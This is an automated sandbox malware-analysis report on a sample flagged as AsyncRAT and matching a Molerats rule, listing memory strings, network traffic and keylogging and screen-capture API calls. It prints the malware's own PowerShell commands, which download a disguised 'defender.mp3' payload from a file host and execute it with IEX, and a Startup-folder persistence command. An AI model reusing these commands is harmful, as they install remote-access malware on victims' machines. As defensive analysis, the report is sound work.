                        Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.g
                        Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gsH
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000B.00000002.244669019.00000179B8E41000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.494107143.0000013384A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmpString found in binary or memory: http://secure.gl
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: Ne - Copy.exe, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmpString found in binary or memory: https://autohotkey.com
                        Source: xuXIetZvv6.exe, 00000000.00000000.219549326.00000000006E2000.00000002.00020000.sdmp, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmpString found in binary or memory: https://autohotkey.comCould
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                        Source: xuXIetZvv6.exe, xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, wscript.exe, 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, wscript.exe, 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmpString found in binary or memory: https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmpString found in binary or memory: https://www.globalsign.com
                        Source: conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                        Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://www.uplooder.net
                        Source: powershell.exe, 0000000E.00000002.491810873.0000013382F10000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.493315849.00000133830B5000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmpString found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3
                        Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp30y
                        Source: conhost.exeString found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmpString found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=openiexplore.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected AsyncRATShow sources
                        Source: Yara matchFile source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
                        Source: Yara matchFile source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPEDMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPEDMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                        Dynamically executes javascript script codeShow sources
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exeCode function: 39_2_00007FF772C17CA0 SetFilePointer,ReadFile,CloseHandle,DestroyWindow,GetModuleFileNameW,#2,MessageBoxW,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exeCode function: 39_2_00007FF772C17EB0 SetFilePointer,ReadFile,CloseHandle,SetFilePointer,ReadFile,CloseHandle,DestroyWindow,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,#4,CLSIDFromProgID,CoCreateInstance,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,#4,#2,#2,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
                        Sample or dropped binary is a compiled AutoHotkey binaryShow sources
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeWindow found: window name: AutoHotkey
                        Wscript starts Powershell (via cmd or directly)Show sources
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,
                        Source: C:\ProgramData\conhost.exeCode function: 8_2_00007FF7AAFD63C0 GetModuleFileNameW,CreateProcessWithLogonW,GetLastError,FormatMessageW,GetLastError,MessageBoxW,LocalFree,GetLastError,ExitProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CreateThread,CoInitialize,GetActiveWindow,SetLastError,GetCurrentThreadId,EnterCriticalSection,LeaveCriticalSection,DialogBoxParamW,CoUninitialize,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                        Source: C:\Users\user\Desktop\xuXIetZvv6.exeCode function: 0_2_00007FFA161F4C90
                        Source: C:\Users\user\Desktop\xuXIetZvv6.exeCode function: 0_2_00007FFA161F0168
                        Source: C:\Users\user\Desktop\xuXIetZvv6.exeCode function: 0_2_00007FFA161F3280
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014001E310
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014001EB30
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014000CF50
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140089180
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140005230
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014001F300
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400415D0
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014001F919
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140055950
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140001B0C
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014007FC00
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014001FD1E
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140124000
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014007C03F
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140070060
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400D8074
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140028120
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014000A120
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140050135
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014005C140
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014004C160
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400581A0